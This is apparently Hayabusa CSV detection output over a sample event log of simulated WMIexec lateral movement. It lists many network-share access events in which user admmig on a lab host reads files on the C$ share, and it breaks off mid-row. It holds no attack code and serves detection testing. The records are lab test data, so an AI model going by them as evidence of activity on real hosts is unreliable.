10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.079 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad78daf4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.079 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad78daf4#\81b597084cf1f78a1957cf8138744f32 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.096 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d030b7# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d030b7#\fa5c1a0df187c30480b0623065a70395 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d06916# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d06916#\d61b7f885a9fd4f4766031b996ca7d6a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb9b5bb58# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.114 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.114 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb9b5bb58#\094367b5bb80758c8f0ab02018658d91 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Contacts\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec 
execution via SMB.evtx +2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wbc80354b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Documents\desktop.ini : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wbc80354b#\1dd94a4862b69a4583662583681346ca : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Downloads\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wc1cc6649# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Favorites\desktop.ini : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wc1cc6649#\c869d6724028906387ff9f65e11cd9a4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Links\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wca5f1176# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Music\desktop.ini : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wca5f1176#\0e765b6e054c8bac98f30ced03330615 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Pictures\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wcffedcb4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Saved Games\desktop.ini : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wcffedcb4#\37b337245bcc60a0f8c6cc814157fd9f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Searches\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd75d181a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Videos\desktop.ini : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd75d181a#\ff89d7fa29ebae7dfdd1cf2db43686dc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd518ee0d# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd518ee0d#\0658126a7d3bc7b0e7f548f2e3a423fb : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We9f24001# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We9f24001#\8505e29c9b52cf09d67343a0fc6f6260 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We0722664# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We0722664#\4b78e11f2ba008b681ae84f8d5ffda55 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wed3937f9# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wed3937f9#\11adbe13e64f66d322e04cd718460b97 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wf493a5fb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wf493a5fb#\8b123051103ee49fa11dd81c04427182 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MIGUIControls : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MIGUIControls\26985cb1bb8c065a2e50e5ac0791fbeb : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MMCEx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MMCEx\ba21ae2888a2764f3d0df9ccd1e95506 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MMCFxCommon : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MMCFxCommon\e2ac72add0eac7c6264297f0a580e745 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MSBuild : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MSBuild\5eda447ab5fd1d3ae7ccfa140388c8b0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\mscorlib : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\a20cafac04a2e9b3bcb5ec4d674775e5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napcrypt : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napcrypt\c97155692ee6bc8729624e1a8f6371c1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\naphlpr : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\naphlpr\8d352c21be1bcfb356df6fec4b6281ec : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napinit : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 